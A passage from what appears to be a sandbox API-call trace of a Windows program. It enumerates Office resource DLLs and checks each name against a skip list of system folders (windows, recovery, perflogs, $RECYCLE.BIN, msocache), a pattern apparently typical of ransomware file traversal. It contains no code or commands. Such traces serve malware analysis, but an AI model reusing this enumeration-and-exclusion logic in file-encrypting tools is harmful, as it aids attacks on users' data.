Flags=0x0, Size=0x50) returned 0x22c2d0 [0126.493] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.resources.dll", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0126.493] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0126.493] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.resources.dll", cchWideChar=37, lpMultiByteStr=0x22cdc8, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.DataWarehouse.resources.dll", lpUsedDefaultChar=0x0) returned 37 [0126.493] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c2d0 | out: hHeap=0x1e0000) returned 1 [0126.493] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf0) returned 0x247b80 [0126.493] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dee0 | out: hHeap=0x1e0000) returned 1 [0126.493] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0126.493] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0126.493] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfc47ce76, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc47ce76, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfc5ae112, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x47068, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", cAlternateFileName="MIB24E~1.DLL")) returned 1 [0126.493] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2=".") returned 1 [0126.493] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="..") returned 1 [0126.493] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="...") returned 1 [0126.493] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="windows") returned -1 [0126.493] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="recovery") returned -1 [0126.494] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="perflogs") returned -1 [0126.494] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="documents and settings") returned 1 [0126.494] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.494] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="system volume information") returned -1 [0126.494] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="msocache") returned -1 [0126.494] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209710 [0126.494] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", cchWideChar=52, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 52 [0126.494] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0126.494] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", cchWideChar=52, lpMultiByteStr=0x20d920, cbMultiByte=52, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpUsedDefaultChar=0x0) returned 52 [0126.494] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209710 | out: hHeap=0x1e0000) returned 1 [0126.494] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209878 [0126.494] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", cchWideChar=52, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 52 [0126.494] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0126.494] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", cchWideChar=52, lpMultiByteStr=0x20dba8, cbMultiByte=52, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpUsedDefaultChar=0x0) returned 52 [0126.494] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209878 | out: hHeap=0x1e0000) returned 1 [0126.494] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x110) returned 0x23dff8 [0126.494] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0126.494] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0126.494] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0126.494] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfbc70f7e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfbc70f7e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfbc97147, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5278, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.ReportingServices.DataExtensions.resources.dll", cAlternateFileName="MI1341~1.DLL")) returned 1 [0126.494] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2=".") returned 1 [0126.494] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="..") returned 1 [0126.494] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="...") returned 1 [0126.494] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="windows") returned -1 [0126.494] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="recovery") returned -1 [0126.494] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="perflogs") returned -1 [0126.494] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="documents and settings") returned 1 [0126.494] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.494] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="system volume information") returned -1 [0126.494] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="msocache") returned -1 [0126.494] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0126.494] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.DataExtensions.resources.dll", cchWideChar=56, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 56 [0126.494] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0126.494] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.DataExtensions.resources.dll", cchWideChar=56, lpMultiByteStr=0x20d920, cbMultiByte=56, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.DataExtensions.resources.dll", lpUsedDefaultChar=0x0) returned 56 [0126.494] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0126.494] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224dd8 [0126.494] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.DataExtensions.resources.dll", cchWideChar=56, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 56 [0126.494] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d578 [0126.495] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.DataExtensions.resources.dll", cchWideChar=56, lpMultiByteStr=0x20d578, cbMultiByte=56, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.DataExtensions.resources.dll", lpUsedDefaultChar=0x0) returned 56 [0126.495] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224dd8 | out: hHeap=0x1e0000) returned 1 [0126.495] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23ede0 [0126.495] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dff8 | out: hHeap=0x1e0000) returned 1 [0126.495] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d578 | out: hHeap=0x1e0000) returned 1 [0126.495] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0126.495] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf6d9d08d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf6d9d08d, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf755cb7d, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x12060, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.ReportingServices.Diagnostics.resources.dll", cAlternateFileName="MI2EA0~1.DLL")) returned 1 [0126.495] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2=".") returned 1 [0126.495] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="..") returned 1 [0126.495] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="...") returned 1 [0126.495] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="windows") returned -1 [0126.495] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="recovery") returned -1 [0126.495] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="perflogs") returned -1 [0126.495] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="documents and settings") returned 1 [0126.495] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.495] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="system volume information") returned -1 [0126.495] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="msocache") returned -1 [0126.495] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209788 [0126.495] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.Diagnostics.resources.dll", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0126.495] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0126.495] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.Diagnostics.resources.dll", cchWideChar=53, lpMultiByteStr=0x20dde8, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.Diagnostics.resources.dll", lpUsedDefaultChar=0x0) returned 53 [0126.495] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209788 | out: hHeap=0x1e0000) returned 1 [0126.495] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209788 [0126.495] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.Diagnostics.resources.dll", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0126.495] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d578 [0126.495] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.Diagnostics.resources.dll", cchWideChar=53, lpMultiByteStr=0x20d578, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.Diagnostics.resources.dll", lpUsedDefaultChar=0x0) returned 53 [0126.495] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209788 | out: hHeap=0x1e0000) returned 1 [0126.495] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x110) returned 0x23e8b8 [0126.495] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ede0 | out: hHeap=0x1e0000) returned 1 [0126.495] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d578 | out: hHeap=0x1e0000) returned 1 [0126.495] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0126.495] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf1480f75, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1480f75, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf158c060, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x19068, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0126.495] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2=".") returned 1 [0126.495] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="..") returned 1 [0126.495] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="...") returned 1 [0126.495] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="windows") returned -1 [0126.496] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="recovery") returned -1 [0126.496] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="perflogs") returned -1 [0126.496] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="documents and settings") returned 1 [0126.496] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.496] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="system volume information") returned -1 [0126.496] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="msocache") returned -1 [0126.496] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224bb8 [0126.496] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", cchWideChar=63, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 63 [0126.496] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0126.496] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", cchWideChar=63, lpMultiByteStr=0x20dde8, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpUsedDefaultChar=0x0) returned 63 [0126.496] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224bb8 | out: hHeap=0x1e0000) returned 1 [0126.496] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225658 [0126.496] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", cchWideChar=63, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 63 [0126.496] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d728 [0126.496] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", cchWideChar=63, lpMultiByteStr=0x20d728, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpUsedDefaultChar=0x0) returned 63 [0126.496] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225658 | out: hHeap=0x1e0000) returned 1 [0126.496] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x130) returned 0x245338 [0126.496] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e8b8 | out: hHeap=0x1e0000) returned 1 [0126.496] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d728 | out: hHeap=0x1e0000) returned 1 [0126.496] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0126.496] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf755cb7d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf755cb7d, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf755cb7d, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x70060, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.ReportingServices.QueryDesigners.resources.dll", cAlternateFileName="MI63FB~1.DLL")) returned 1 [0126.496] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2=".") returned 1 [0126.496] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="..") returned 1 [0126.496] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="...") returned 1 [0126.496] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="windows") returned -1 [0126.496] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="recovery") returned -1 [0126.496] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="perflogs") returned -1 [0126.496] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="documents and settings") returned 1 [0126.496] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.496] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="system volume information") returned -1 [0126.496] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="msocache") returned -1 [0126.496] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0126.496] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.resources.dll", cchWideChar=56, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 56 [0126.496] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0126.496] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.resources.dll", cchWideChar=56, lpMultiByteStr=0x20d698, cbMultiByte=56, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpUsedDefaultChar=0x0) returned 56 [0126.496] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0126.496] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224bb8 [0126.497] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.resources.dll", cchWideChar=56, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 56 [0126.497] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d578 [0126.497] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.resources.dll", cchWideChar=56, lpMultiByteStr=0x20d578, cbMultiByte=56, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpUsedDefaultChar=0x0) returned 56 [0126.497] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224bb8 | out: hHeap=0x1e0000) returned 1 [0126.497] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f5f8 [0126.497] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x245338 | out: hHeap=0x1e0000) returned 1 [0126.497] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d578 | out: hHeap=0x1e0000) returned 1 [0126.497] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0126.497] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6c6cdcd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6c6cdcd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6c6cdcd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x15060, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", cAlternateFileName="MI5C38~1.DLL")) returned 1 [0126.497] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2=".") returned 1 [0126.497] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="..") returned 1 [0126.497] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="...") returned 1 [0126.497] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="windows") returned -1 [0126.497] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="recovery") returned -1 [0126.497] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="perflogs") returned -1 [0126.497] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="documents and settings") returned 1 [0126.497] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.497] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="system volume information") returned -1 [0126.497] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="msocache") returned -1 [0126.497] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224dd8 [0126.497] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", cchWideChar=61, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0126.497] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d728 [0126.497] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", cchWideChar=61, lpMultiByteStr=0x20d728, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpUsedDefaultChar=0x0) returned 61 [0126.497] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224dd8 | out: hHeap=0x1e0000) returned 1 [0126.497] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224ee8 [0126.497] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", cchWideChar=61, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0126.497] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d578 [0126.497] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", cchWideChar=61, lpMultiByteStr=0x20d578, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpUsedDefaultChar=0x0) returned 61 [0126.497] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224ee8 | out: hHeap=0x1e0000) returned 1 [0126.497] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f030 [0126.497] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f5f8 | out: hHeap=0x1e0000) returned 1 [0126.497] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d578 | out: hHeap=0x1e0000) returned 1 [0126.497] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d728 | out: hHeap=0x1e0000) returned 1 [0126.497] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf80d6078, ftCreationTime.dwHighDateTime=0x1d327e7, 